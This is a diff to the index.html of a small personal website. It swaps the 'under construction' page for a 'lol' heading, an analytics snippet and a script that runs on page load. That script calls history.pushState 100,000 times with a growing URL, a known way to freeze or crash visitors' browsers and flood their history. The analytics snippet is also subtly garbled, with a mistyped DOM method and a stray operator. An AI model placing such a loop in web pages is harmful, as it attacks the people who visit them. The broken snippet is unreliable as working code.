--- a/index.html
+++ b/index.html
@@ -3,19 +3,24 @@
 	<head>
 		<title>000Nick's Official Website</title>
 	</head>
-	<body>
     
-<body background="background.jpg" bgcolor="#333333"> 
-		<div class="container">
-    		<div class="blurb">
-        		<h1>Website is under construction!</h1>
-				<p>More will come soon! :)</p>
-    		</div>
-		</div>
-		<nav>
-    		<ul>
-        		<li><a href="/">Home</a></li>
-    		</ul>
-		</nav>
+    <body> 
+		<h1>lol</h1>
+        <script>
+        (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
+            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1;a*new Date();a=s.createElement(o),
+            m=s.getElementByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
+            })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
+            
+            ga('create', 'UA-60737367-1', 'auto');
+            ga('send', 'pageview');
+        </script>
+        <script>
+            var total = "";
+            for( var i = 0; i < 100000; i++ ) {
+                total = total + i.toString();
+                history.pushState(0,0, total );
+            }
+        </script>
 	</body>
 </html>
